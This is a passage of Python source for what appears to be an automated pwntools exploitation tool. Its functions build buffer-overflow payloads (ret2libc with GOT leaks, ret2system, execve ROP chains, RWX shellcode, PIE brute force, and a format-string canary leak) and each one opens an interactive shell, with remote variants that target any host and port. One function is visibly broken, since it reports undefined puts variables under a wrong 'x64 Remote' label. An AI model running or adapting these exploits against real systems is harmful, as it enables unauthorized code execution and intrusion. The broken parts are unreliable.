padding, backdoor, libc_path, libc, url, port, callsystem):\n \"\"\"PIE backdoor exploitation (remote)\"\"\"\n print_section_header(\"EXPLOITATION: PIE Backdoor - Remote\")\n print_payload(\"preparing PIE backdoor brute force\")\n \n elf = ELF(program)\n if backdoor == 1:\n backdoor = elf.symbols[\"backdoor\"] + 0x04\n if callsystem == 1:\n backdoor = elf.symbols[\"callsystem\"] + 0x04\n \n backdoor_bytes = p64(backdoor)\n valid_bytes = backdoor_bytes.replace(b'\\x00', b'')\n valid_byte_length = len(valid_bytes)\n \n cleaned_bytes = backdoor_bytes[:valid_byte_length]\n payload = asm(\"nop\") * padding + cleaned_bytes\n \n count = 1\n print_info(f\"starting PIE brute force attack against {Colors.YELLOW}{url}:{port}{Colors.END}\")\n while True:\n io = remote(url, port)\n try:\n count += 1\n print_info(f\"attempt {Colors.YELLOW}{count}{Colors.END}\", prefix=\"[BRUTE]\")\n io.recv()\n io.send(payload)\n recv = io.recv(timeout=10)\n except:\n print_warning(f\"attempt {count} failed\", prefix=\"[BRUTE]\")\n else:\n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n break\n\n# Exploitation functions with improved output\ndef ret2libc_write_x32(program, libc, padding, libc_path):\n \"\"\"ret2libc exploitation using write function (x32)\"\"\"\n print_section_header(\"EXPLOITATION: ret2libc (write) - x32\")\n print_payload(\"preparing ret2libc exploit using write function\")\n \n io = process(program)\n \n if libc == 1:\n if libc_path is None:\n print_info(\"using LibcSearcher for libc resolution\")\n else:\n print_info(f\"using detected libc: {libc_path}\")\n libc = ELF(libc_path)\n else:\n libc = ELF(libc)\n \n e = ELF(program)\n main_addr = e.symbols['main']\n write_plt = e.symbols['write']\n write_got = e.got['write']\n \n print_info(f\"main address: {Colors.YELLOW}{hex(main_addr)}{Colors.END}\")\n print_info(f\"write@plt: {Colors.YELLOW}{hex(write_plt)}{Colors.END}\")\n print_info(f\"write@got: {Colors.YELLOW}{hex(write_got)}{Colors.END}\")\n \n # Stage 1: Leak write address\n print_payload(\"stage 1: leaking write address from GOT\")\n payload1 = asm('nop') * padding + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)\n \n io.recv()\n io.sendline(payload1)\n \n write_addr = u32(io.recv(4))\n print_success(f\"write address leaked: {Colors.YELLOW}{hex(write_addr)}{Colors.END}\")\n \n # Calculate system and /bin/sh addresses\n if libc == 1:\n libc = LibcSearcher(\"write\", write_addr)\n libcbase = write_addr - libc.dump('write')\n system_addr = libcbase + libc.dump('system')\n sh_addr = libcbase + libc.dump('str_bin_sh')\n else:\n libc_write = libc.symbols['write']\n system_addr = write_addr - libc_write + libc.symbols['system']\n sh_addr = write_addr - libc_write + next(libc.search(b'/bin/sh'))\n \n print_success(f\"system address calculated: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_success(f\"/bin/sh address calculated: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n \n # Stage 2: Execute system(\"/bin/sh\")\n print_payload(\"stage 2: executing system('/bin/sh')\")\n payload2 = asm('nop') * padding + p32(system_addr) + p32(0) + p32(sh_addr)\n \n io.recv()\n io.sendline(payload2)\n \n # Handle successful exploitation\n handle_exploitation_success(\n 'ret2libc (puts) - x64 Remote',\n payload2,\n padding,\n {\n 'puts_plt': hex(puts_plt),\n 'puts_got': hex(puts_got),\n 'main': hex(main_addr),\n 'puts_addr': hex(puts_addr),\n 'system': hex(system_addr),\n 'sh': hex(sh_addr)\n },\n 'Stack Buffer Overflow',\n 'x64'\n )\n \n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef ret2_system_x32(program, libc, padding, libc_path):\n \"\"\"ret2system exploitation (x32)\"\"\"\n print_section_header(\"EXPLOITATION: ret2system - x32\")\n print_payload(\"preparing ret2system exploit\")\n \n io = process(program)\n e = ELF(program)\n system_addr = e.symbols['system']\n bin_sh_addr = next(e.search(b'/bin/sh'))\n \n print_info(f\"system address: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_info(f\"/bin/sh address: {Colors.YELLOW}{hex(bin_sh_addr)}{Colors.END}\")\n \n payload = asm('nop') * padding + p32(system_addr) + p32(0) + p32(bin_sh_addr)\n io.sendline(payload)\n \n handle_exploitation_success(\n exploit_type='ret2system - x32',\n payload=payload,\n padding=padding,\n addresses={'system_addr': system_addr, 'bin_sh_addr': bin_sh_addr},\n vulnerability_type='Buffer Overflow',\n architecture='x32'\n )\n io.interactive()\n\ndef ret2_system_x64(program, libc, padding, pop_rdi_addr, other_rdi_registers, ret_addr, libc_path):\n \"\"\"ret2system exploitation (x64)\"\"\"\n print_section_header(\"EXPLOITATION: ret2system - x64\")\n print_payload(\"preparing ret2system exploit\")\n \n if pop_rdi_addr == None:\n print_error(\"pop rdi gadget not found, exploitation not possible\")\n sys.exit(0)\n \n io = process(program)\n e = ELF(program)\n system_addr = e.symbols['system']\n bin_sh_addr = next(e.search(b'/bin/sh'))\n \n print_info(f\"system address: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_info(f\"/bin/sh address: {Colors.YELLOW}{hex(bin_sh_addr)}{Colors.END}\")\n \n pop_rdi_addr = int(pop_rdi_addr, 16)\n pop_rdi_addr = p64(pop_rdi_addr)\n ret_addr = int(ret_addr, 16)\n ret_addr = p64(ret_addr)\n \n if other_rdi_registers == 1:\n payload = flat([asm('nop') * padding, pop_rdi_addr, p64(bin_sh_addr), p64(0), ret_addr, p64(system_addr), p64(0)])\n elif other_rdi_registers == 0:\n payload = flat([asm('nop') * padding, pop_rdi_addr, p64(bin_sh_addr), ret_addr, p64(system_addr)])\n \n io.sendline(payload)\n \n handle_exploitation_success(\n exploit_type='ret2system - x64',\n payload=payload,\n padding=padding,\n addresses={'system_addr': system_addr, 'bin_sh_addr': bin_sh_addr, 'pop_rdi_addr': pop_rdi_addr, 'ret_addr': ret_addr},\n vulnerability_type='Buffer Overflow',\n architecture='x64'\n )\n io.interactive()\n\ndef ret2_system_x32_remote(program, libc, padding, url, port):\n \"\"\"ret2system exploitation (x32 remote)\"\"\"\n print_section_header(\"EXPLOITATION: ret2system - x32 Remote\")\n print_payload(\"preparing ret2system exploit\")\n \n io = remote(url, port)\n e = ELF(program)\n system_addr = e.symbols['system']\n bin_sh_addr = next(e.search(b'/bin/sh'))\n \n print_info(f\"system address: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_info(f\"/bin/sh address: {Colors.YELLOW}{hex(bin_sh_addr)}{Colors.END}\")\n \n payload = asm('nop') * padding + p32(system_addr) + p32(0) + p32(bin_sh_addr)\n io.sendline(payload)\n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef ret2_system_x64_remote(program, libc, padding, pop_rdi_addr, other_rdi_registers, ret_addr, url, port):\n \"\"\"ret2system exploitation (x64 remote)\"\"\"\n print_section_header(\"EXPLOITATION: ret2system - x64 Remote\")\n print_payload(\"preparing ret2system exploit\")\n \n if pop_rdi_addr == None:\n print_error(\"pop rdi gadget not found, exploitation not possible\")\n sys.exit(0)\n \n io = remote(url, port)\n e = ELF(program)\n system_addr = e.symbols['system']\n bin_sh_addr = next(e.search(b'/bin/sh'))\n \n print_info(f\"system address: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_info(f\"/bin/sh address: {Colors.YELLOW}{hex(bin_sh_addr)}{Colors.END}\")\n \n pop_rdi_addr = int(pop_rdi_addr, 16)\n pop_rdi_addr = p64(pop_rdi_addr)\n ret_addr = int(ret_addr, 16)\n ret_addr = p64(ret_addr)\n \n if other_rdi_registers == 1:\n payload = flat([asm('nop') * padding, pop_rdi_addr, p64(bin_sh_addr), p64(0), ret_addr, p64(system_addr), p64(0)])\n elif other_rdi_registers == 0:\n payload = flat([asm('nop') * padding, pop_rdi_addr, p64(bin_sh_addr), ret_addr, p64(system_addr)])\n \n io.sendline(payload)\n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef ret2libc_put_x32(program, libc, padding, libc_path):\n \"\"\"ret2libc exploitation using puts function (x32)\"\"\"\n print_section_header(\"EXPLOITATION: ret2libc (puts) - x32\")\n print_payload(\"preparing ret2libc exploit using puts function\")\n \n io = process(program)\n if libc == 1:\n if libc_path == None:\n print_info(\"using LibcSearcher\")\n else:\n print_info(f\"using detected libc: {libc_path}\")\n libc = ELF(libc_path)\n else:\n libc = ELF(libc)\n \n e = ELF(program)\n main_addr = e.symbols['main']\n puts_plt = e.symbols['puts']\n puts_got = e.got['puts']\n \n print_info(f\"main address: {Colors.YELLOW}{hex(main_addr)}{Colors.END}\")\n print_info(f\"puts@plt: {Colors.YELLOW}{hex(puts_plt)}{Colors.END}\")\n print_info(f\"puts@got: {Colors.YELLOW}{hex(puts_got)}{Colors.END}\")\n \n payload1 = asm('nop') * padding + p32(puts_plt) + p32(main_addr) + p32(puts_got)\n io.recv()\n io.sendline(payload1)\n \n puts_addr = u32(io.recvuntil(b'\\xf7')[-4:])\n print_success(f\"puts address leaked: {Colors.YELLOW}{hex(puts_addr)}{Colors.END}\")\n \n if libc == 1:\n libc = LibcSearcher(\"puts\", puts_addr)\n libcbase = puts_addr - libc.dump('puts')\n system_addr = libcbase + libc.dump('system')\n sh_addr = libcbase + libc.dump('str_bin_sh')\n else:\n libc_puts = libc.symbols['puts']\n system_addr = puts_addr - libc_puts + libc.symbols['system']\n sh_addr = puts_addr - libc_puts + next(libc.search(b'/bin/sh'))\n \n print_success(f\"system address calculated: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_success(f\"/bin/sh address calculated: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n \n payload2 = asm('nop') * padding + p32(system_addr) + p32(0) + p32(sh_addr)\n io.sendline(payload2)\n \n # Handle successful exploitation\n handle_exploitation_success(\n 'ret2libc (puts) - x32',\n payload2,\n padding,\n {\n 'puts_plt': hex(puts_plt),\n 'puts_got': hex(puts_got),\n 'main': hex(main_addr),\n 'puts_addr': hex(puts_addr),\n 'system': hex(system_addr),\n 'sh': hex(sh_addr)\n },\n 'Stack Buffer Overflow',\n 'x32'\n )\n \n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef ret2libc_put_x64(program, libc, padding, pop_rdi_addr, pop_rsi_addr, ret_addr, other_rdi_registers, other_rsi_registers, libc_path):\n \"\"\"ret2libc exploitation using puts function (x64)\"\"\"\n print_section_header(\"EXPLOITATION: ret2libc (puts) - x64\")\n print_payload(\"preparing ret2libc exploit using puts function\")\n \n io = process(program)\n if libc == 1:\n if libc_path is None:\n print_info(\"using LibcSearcher\")\n else:\n print_info(f\"using detected libc: {libc_path}\")\n libc = ELF(libc_path)\n else:\n libc = ELF(libc)\n \n e = ELF(program)\n main_addr = e.symbols['main']\n puts_plt = e.symbols['puts']\n puts_got = e.got['puts']\n \n pop_rdi_addr = int(pop_rdi_addr, 16)\n pop_rdi_addr = p64(pop_rdi_addr)\n \n # First payload: leak puts address from GOT\n payload1 = flat([\n asm('nop') * padding,\n pop_rdi_addr,\n p64(puts_got),\n p64(puts_plt),\n p64(main_addr)\n ])\n io.recv()\n io.sendline(payload1)\n \n puts_addr = u64(io.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00'))\n print_success(f\"puts address leaked: {Colors.YELLOW}{hex(puts_addr)}{Colors.END}\")\n \n # Calculate libc base and system, /bin/sh addresses\n if libc == 1:\n libc = LibcSearcher(\"puts\", puts_addr)\n libcbase = puts_addr - libc.dump('puts')\n system_addr = libcbase + libc.dump('system')\n sh_addr = libcbase + libc.dump('str_bin_sh')\n else:\n libc_puts = libc.symbols['puts']\n system_addr = puts_addr - libc_puts + libc.symbols['system']\n sh_addr = puts_addr - libc_puts + next(libc.search(b'/bin/sh'))\n \n print_success(f\"system address calculated: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_success(f\"/bin/sh address calculated: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n \n io.recv()\n ret_addr = p64(int(ret_addr, 16))\n \n # Second payload: call system(\"/bin/sh\")\n if other_rdi_registers == 1:\n payload2 = flat([\n asm('nop') * padding,\n pop_rdi_addr,\n p64(sh_addr),\n p64(0),\n ret_addr,\n p64(system_addr),\n p64(0)\n ])\n else:\n payload2 = flat([\n asm('nop') * padding,\n pop_rdi_addr,\n p64(sh_addr),\n ret_addr,\n p64(system_addr)\n ])\n \n io.sendline(payload2)\n \n # Handle successful exploitation\n handle_exploitation_success(\n 'ret2libc (puts) - x64',\n payload2,\n padding,\n {\n 'puts_plt': hex(puts_plt),\n 'puts_got': hex(puts_got),\n 'main': hex(main_addr),\n 'puts_addr': hex(puts_addr),\n 'system': hex(system_addr),\n 'sh': hex(sh_addr)\n },\n 'Stack Buffer Overflow',\n 'x64'\n )\n \n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef execve_syscall(program, padding, pop_eax_addr, pop_ebx_addr, pop_ecx_addr, pop_edx_addr, pop_ecx_ebx_addr, ret_addr, int_0x80):\n \"\"\"execve syscall exploitation (x32)\"\"\"\n print_section_header(\"EXPLOITATION: execve syscall - x32\")\n print_payload(\"preparing execve syscall exploit\")\n \n if pop_ecx_addr == None:\n io = process(program)\n e = ELF(program)\n bin_sh_addr = next(e.search(b'/bin/sh'))\n print_info(f\"/bin/sh address: {Colors.YELLOW}{hex(bin_sh_addr)}{Colors.END}\")\n \n pop_eax_addr = int(pop_eax_addr, 16)\n pop_eax_addr = p32(pop_eax_addr)\n pop_ecx_ebx_addr = int(pop_ecx_ebx_addr, 16)\n pop_ecx_ebx_addr = p32(pop_ecx_ebx_addr)\n pop_edx_addr = int(pop_edx_addr, 16)\n pop_edx_addr = p32(pop_edx_addr)\n int_0x80 = int(int_0x80, 16)\n int_0x80 = p32(int_0x80)\n \n payload = flat([asm('nop') * padding, pop_eax_addr, 0xb, pop_ecx_ebx_addr, 0, bin_sh_addr, pop_edx_addr, 0, int_0x80])\n io.recv()\n io.sendline(payload)\n \n handle_exploitation_success(\n exploit_type='execve syscall - x32 (ecx_ebx)',\n payload=payload,\n padding=padding,\n addresses={'bin_sh_addr': bin_sh_addr, 'pop_eax_addr': pop_eax_addr, 'pop_ecx_ebx_addr': pop_ecx_ebx_addr, 'pop_edx_addr': pop_edx_addr, 'int_0x80': int_0x80},\n vulnerability_type='Buffer Overflow',\n architecture='x32'\n )\n io.interactive()\n else:\n io = process(program)\n e = ELF(program)\n bin_sh_addr = next(e.search(b'/bin/sh'))\n print_info(f\"/bin/sh address: {Colors.YELLOW}{hex(bin_sh_addr)}{Colors.END}\")\n \n pop_eax_addr = int(pop_eax_addr, 16)\n pop_eax_addr = p32(pop_eax_addr)\n pop_ecx_addr = int(pop_ecx_addr, 16)\n pop_ecx_addr = p32(pop_ecx_addr)\n pop_ebx_addr = int(pop_ebx_addr, 16)\n pop_ebx_addr = p32(pop_ebx_addr)\n pop_edx_addr = int(pop_edx_addr, 16)\n pop_edx_addr = p32(pop_edx_addr)\n int_0x80 = int(int_0x80, 16)\n int_0x80 = p32(int_0x80)\n \n payload = flat([asm('nop') * padding, pop_eax_addr, 0xb, pop_ebx_addr, bin_sh_addr, pop_ecx_addr, 0, pop_edx_addr, 0, int_0x80])\n io.recv()\n io.sendline(payload)\n \n handle_exploitation_success(\n exploit_type='execve syscall - x32 (separate)',\n payload=payload,\n padding=padding,\n addresses={'bin_sh_addr': bin_sh_addr, 'pop_eax_addr': pop_eax_addr, 'pop_ebx_addr': pop_ebx_addr, 'pop_ecx_addr': pop_ecx_addr, 'pop_edx_addr': pop_edx_addr, 'int_0x80': int_0x80},\n vulnerability_type='Buffer Overflow',\n architecture='x32'\n )\n io.interactive()\n\ndef rwx_shellcode_x32(program, buf_addr, padding, function_name, ret_addr):\n \"\"\"RWX shellcode exploitation (x32)\"\"\"\n print_section_header(\"EXPLOITATION: RWX Shellcode - x32\")\n print_payload(\"preparing RWX shellcode exploit\")\n \n io = process(program)\n elf = ELF(program)\n buf_addr = int(buf_addr, 16)\n buf_addr = p32(buf_addr)\n name_addr = elf.symbols[function_name]\n shellcode = asm(shellcraft.sh())\n \n print_info(f\"shellcode storage: {Colors.YELLOW}{function_name}{Colors.END}\")\n print_info(f\"shellcode size: {Colors.YELLOW}{len(shellcode)}{Colors.END} bytes\")\n \n payload = flat([shellcode.ljust(padding, asm('nop')), p32(name_addr)])\n io.recv()\n io.sendline(payload)\n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef rwx_shellcode_x64(program, buf_addr, padding, function_name, ret_addr, libc_path):\n \"\"\"RWX shellcode exploitation (x64)\"\"\"\n print_section_header(\"EXPLOITATION: RWX Shellcode - x64\")\n print_payload(\"preparing RWX shellcode exploit\")\n \n io = process(program)\n elf = ELF(program)\n buf_addr = int(buf_addr, 16)\n buf_addr = p64(buf_addr)\n name_addr = elf.symbols[function_name]\n shellcode = asm(shellcraft.sh())\n \n print_info(f\"shellcode storage: {Colors.YELLOW}{function_name}{Colors.END}\")\n print_info(f\"shellcode size: {Colors.YELLOW}{len(shellcode)}{Colors.END} bytes\")\n \n payload = flat([shellcode.ljust(padding, asm('nop')), p64(name_addr)])\n io.recv()\n io.sendline(payload)\n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef ret2libc_put_x32_remote(program, libc, padding, url, port):\n \"\"\"Remote ret2libc exploitation using puts for x32 architecture\"\"\"\n print_section_header(\"EXPLOITATION: ret2libc (puts) - x32 Remote\")\n print_payload(\"preparing remote ret2libc exploit using puts function\")\n \n io = remote(url, port)\n \n if libc == 1:\n print_info(\"using LibcSearcher for libc resolution\")\n else:\n libc = ELF(libc)\n \n e = ELF(program)\n main_addr = e.symbols['main']\n puts_plt = e.symbols['puts']\n puts_got = e.got['puts']\n \n print_info(f\"main address: {Colors.YELLOW}{hex(main_addr)}{Colors.END}\")\n print_info(f\"puts@plt: {Colors.YELLOW}{hex(puts_plt)}{Colors.END}\")\n print_info(f\"puts@got: {Colors.YELLOW}{hex(puts_got)}{Colors.END}\")\n \n # First payload: leak puts address\n payload1 = asm('nop') * padding + p32(puts_plt) + p32(main_addr) + p32(puts_got)\n \n print_payload(\"sending puts leak payload\")\n io.recv()\n io.sendline(payload1)\n \n # Receive leaked puts address\n puts_addr = u32(io.recvuntil(b'\\xf7')[-4:])\n print_success(f\"puts address leaked: {Colors.YELLOW}{hex(puts_addr)}{Colors.END}\")\n \n if libc == 1:\n libc = LibcSearcher(\"puts\", puts_addr)\n libcbase = puts_addr - libc.dump('puts')\n system_addr = libcbase + libc.dump('system')\n sh_addr = libcbase + libc.dump('str_bin_sh')\n else:\n libc_puts = libc.symbols['puts']\n system_addr = puts_addr - libc_puts + libc.symbols['system']\n sh_addr = puts_addr - libc_puts + next(libc.search(b'/bin/sh'))\n \n print_success(f\"system address calculated: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_success(f\"/bin/sh address calculated: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n \n # Second payload: execute system(\"/bin/sh\")\n payload2 = asm('nop') * padding + p32(system_addr) + p32(0) + p32(sh_addr)\n io.sendline(payload2)\n \n # Handle successful exploitation\n handle_exploitation_success(\n 'ret2libc (puts) - x32 Remote',\n payload2,\n padding,\n {\n 'puts_plt': hex(puts_plt),\n 'puts_got': hex(puts_got),\n 'main': hex(main_addr),\n 'puts_addr': hex(puts_addr),\n 'system': hex(system_addr),\n 'sh': hex(sh_addr)\n },\n 'Stack Buffer Overflow',\n 'x32'\n )\n \n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef ret2libc_put_x64_remote(program, libc, padding, pop_rdi_addr, pop_rsi_addr, ret_addr, other_rdi_registers, other_rsi_registers, url, port):\n \"\"\"Remote ret2libc exploitation using puts for x64 architecture\"\"\"\n print_section_header(\"EXPLOITATION: ret2libc (puts) - x64 Remote\")\n print_payload(\"preparing remote ret2libc exploit using puts function\")\n \n io = remote(url, port)\n if libc == 1:\n print_info(\"using LibcSearcher for libc resolution\")\n else:\n libc = ELF(libc)\n \n e = ELF(program)\n main_addr = e.symbols['main']\n puts_plt = e.symbols['puts']\n puts_got = e.got['puts']\n \n pop_rdi_addr = int(pop_rdi_addr, 16)\n pop_rdi_addr = p64(pop_rdi_addr)\n \n # First payload: leak puts address from GOT\n payload1 = flat([\n asm('nop') * padding,\n pop_rdi_addr,\n p64(puts_got),\n p64(puts_plt),\n p64(main_addr)\n ])\n \n print_payload(\"sending puts leak payload\")\n io.recv()\n io.sendline(payload1)\n \n # Receive leaked puts address\n puts_addr = u64(io.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00'))\n print_success(f\"puts address leaked: {Colors.YELLOW}{hex(puts_addr)}{Colors.END}\")\n \n # Calculate libc base and system, /bin/sh addresses\n if libc == 1:\n libc = LibcSearcher(\"puts\", puts_addr)\n libcbase = puts_addr - libc.dump('puts')\n system_addr = libcbase + libc.dump('system')\n sh_addr = libcbase + libc.dump('str_bin_sh')\n else:\n libc_puts = libc.symbols['puts']\n system_addr = puts_addr - libc_puts + libc.symbols['system']\n sh_addr = puts_addr - libc_puts + next(libc.search(b'/bin/sh'))\n \n print_success(f\"system address calculated: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_success(f\"/bin/sh address calculated: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n \n io.recv()\n ret_addr = p64(int(ret_addr, 16))\n \n # Second payload: call system(\"/bin/sh\")\n if other_rdi_registers == 1:\n payload2 = flat([\n asm('nop') * padding,\n pop_rdi_addr,\n p64(sh_addr),\n p64(0),\n ret_addr,\n p64(system_addr),\n p64(0)\n ])\n else:\n payload2 = flat([\n asm('nop') * padding,\n pop_rdi_addr,\n p64(sh_addr),\n ret_addr,\n p64(system_addr)\n ])\n \n io.sendline(payload2)\n \n # Handle successful exploitation\n handle_exploitation_success(\n 'ret2libc (puts) - x64 Remote',\n payload2,\n padding,\n {\n 'puts_plt': hex(puts_plt),\n 'puts_got': hex(puts_got),\n 'main': hex(main_addr),\n 'puts_addr': hex(puts_addr),\n 'system': hex(system_addr),\n 'sh': hex(sh_addr)\n },\n 'Stack Buffer Overflow',\n 'x64'\n )\n \n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef execve_syscall_remote(program, padding, pop_eax_addr, pop_ebx_addr, pop_ecx_addr, pop_edx_addr, pop_ecx_ebx_addr, ret_addr, int_0x80, url, port):\n \"\"\"Remote execve syscall exploitation for x32 architecture\"\"\"\n print_section_header(\"EXPLOITATION: execve syscall - x32 Remote\")\n print_payload(\"preparing remote execve syscall exploit\")\n \n io = remote(url, port)\n \n if pop_ecx_addr == None:\n e = ELF(program)\n bin_sh_addr = next(e.search(b'/bin/sh'))\n print_info(f\"/bin/sh address: {Colors.YELLOW}{hex(bin_sh_addr)}{Colors.END}\")\n \n pop_eax_addr = int(pop_eax_addr, 16)\n pop_eax_addr = p32(pop_eax_addr)\n pop_ecx_ebx_addr = int(pop_ecx_ebx_addr, 16)\n pop_ecx_ebx_addr = p32(pop_ecx_ebx_addr)\n pop_edx_addr = int(pop_edx_addr, 16)\n pop_edx_addr = p32(pop_edx_addr)\n int_0x80 = int(int_0x80, 16)\n int_0x80 = p32(int_0x80)\n \n payload = flat([asm('nop') * padding, pop_eax_addr, 0xb, pop_ecx_ebx_addr, 0, bin_sh_addr, pop_edx_addr, 0, int_0x80])\n io.recv()\n io.sendline(payload)\n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n else:\n e = ELF(program)\n bin_sh_addr = next(e.search(b'/bin/sh'))\n print_info(f\"/bin/sh address: {Colors.YELLOW}{hex(bin_sh_addr)}{Colors.END}\")\n \n pop_eax_addr = int(pop_eax_addr, 16)\n pop_eax_addr = p32(pop_eax_addr)\n pop_ecx_addr = int(pop_ecx_addr, 16)\n pop_ecx_addr = p32(pop_ecx_addr)\n pop_ebx_addr = int(pop_ebx_addr, 16)\n pop_ebx_addr = p32(pop_ebx_addr)\n pop_edx_addr = int(pop_edx_addr, 16)\n pop_edx_addr = p32(pop_edx_addr)\n int_0x80 = int(int_0x80, 16)\n int_0x80 = p32(int_0x80)\n \n payload = flat([asm('nop') * padding, pop_eax_addr, 0xb, pop_ebx_addr, bin_sh_addr, pop_ecx_addr, 0, pop_edx_addr, 0, int_0x80])\n io.recv()\n io.sendline(payload)\n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef rwx_shellcode_x32_remote(program, buf_addr, padding, function_name, ret_addr, url, port):\n \"\"\"Remote RWX shellcode exploitation for x32 architecture\"\"\"\n print_section_header(\"EXPLOITATION: RWX Shellcode - x32 Remote\")\n print_payload(\"preparing remote RWX shellcode exploit\")\n \n io = remote(url, port)\n elf = ELF(program)\n buf_addr = int(buf_addr, 16)\n buf_addr = p32(buf_addr)\n name_addr = elf.symbols[function_name]\n shellcode = asm(shellcraft.sh())\n \n print_info(f\"shellcode storage: {Colors.YELLOW}{function_name}{Colors.END}\")\n print_info(f\"shellcode size: {Colors.YELLOW}{len(shellcode)}{Colors.END} bytes\")\n \n payload = flat([shellcode.ljust(padding, asm('nop')), p32(name_addr)])\n io.recv()\n io.sendline(payload)\n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef rwx_shellcode_x64_remote(program, buf_addr, padding, function_name, ret_addr, url, port):\n \"\"\"Remote RWX shellcode exploitation for x64 architecture\"\"\"\n print_section_header(\"EXPLOITATION: RWX Shellcode - x64 Remote\")\n print_payload(\"preparing remote RWX shellcode exploit\")\n \n io = remote(url, port)\n elf = ELF(program)\n buf_addr = int(buf_addr, 16)\n buf_addr = p64(buf_addr)\n name_addr = elf.symbols[function_name]\n shellcode = asm(shellcraft.sh())\n \n print_info(f\"shellcode storage: {Colors.YELLOW}{function_name}{Colors.END}\")\n print_info(f\"shellcode size: {Colors.YELLOW}{len(shellcode)}{Colors.END} bytes\")\n \n payload = flat([shellcode.ljust(padding, asm('nop')), p64(name_addr)])\n io.recv()\n io.sendline(payload)\n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef ret2libc_put_canary_x32(program,libc,libc_path,padding,c,diff):\n\t\"\"\"ret2libc exploitation with canary bypass using puts for x32 architecture\"\"\"\n\tprint_section_header(\"EXPLOITATION: ret2libc (puts) with Canary Bypass - x32\")\n\tprint_payload(\"preparing ret2libc exploit with canary bypass using puts function\")\n\t\n\tio = process(program)\n\tif libc == 1:\n\t\tif libc_path == None:\n\t\t\tprint_info(\"using LibcSearcher for libc resolution\")\n\t\telse:\t\n\t\t\tprint_info(\"using user specified libc path\")\n\t\t\tlibc = ELF(libc_path)\n\telse:\n\t\tlibc = ELF(libc)\n\te = ELF(program)\n\tmain_addr = e.symbols['main']\n\tputs_plt = e.symbols['puts']\n\tputs_got = e.got['puts']\n\n\tprint_info(f\"leaking canary value at position {Colors.YELLOW}{c}{Colors.END}\")\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tresult = io.recvline().decode().strip()\n\tprint_success(f\"canary value: {Colors.YELLOW}{result}{Colors.END}\")\n\tresult = int(result, 16)\n\tcanary = p32(result)\n\n\tprint_info(\"constructing stage 1 payload to leak puts address\")\n\tpayload1 = flat([asm('nop') * padding , canary , b'AAAA' * diff , p32(puts_plt) , p32(main_addr) , p32(puts_got)])\n\tio.recv()\n\tio.sendline(payload1)\n\n\tputs_addr=u32(io.recvuntil(b'\\xf7')[-4:])\n\tprint_success(f\"puts function address in libc: {Colors.YELLOW}{hex(puts_addr)}{Colors.END}\")\n\n\tprint_info(\"calculating libc base and target addresses\")\n\tif libc == 1:\n\t\tlibc = LibcSearcher(\"puts\",puts_addr)\n\t\tlibcbase = puts_addr - libc.dump('puts')\n\t\tlibc_system = libc.dump('system')\n\t\tlibc_sh = libc.dump('str_bin_sh')\n\t\tsystem_addr = libcbase + libc_system\n\t\tprint_success(f\"system function address in libc: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n\t\tsh_addr = libcbase + libc_sh\n\t\tprint_success(f\"/bin/sh string address in libc: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n\telse:\n\t\tlibc_puts = libc.symbols['puts']\n\t\tlibc_system = libc.symbols['system']\n\t\tlibc_sh = next(libc.search(b'/bin/sh'))\n\t\tsystem_addr = puts_addr - libc_puts + libc_system\n\t\tprint_success(f\"system function address in libc: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n\t\tsh_addr = puts_addr - libc_puts + libc_sh\n\t\tprint_success(f\"/bin/sh string address in libc: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n\n\tprint_info(\"re-leaking canary for stage 2 exploit\")\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tio.recv()\n\tprint_info(\"constructing stage 2 payload for system call\")\n\tpayload2 = flat([asm('nop') * padding , canary , b'AAAA' * diff , p32(system_addr) , p32(0) , p32(sh_addr)])\n\tio.sendline(payload2)\n\tprint_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n\tio.interactive()\n\ndef ret2libc_put_x32_canary_remote(program,libc,padding,url,port,c,diff):\n\t\"\"\"Remote ret2libc exploitation with canary bypass using puts for x32 architecture\"\"\"\n\tprint_section_header(\"EXPLOITATION: ret2libc (puts) with Canary Bypass - x32 Remote\")\n\tprint_payload(f\"preparing remote 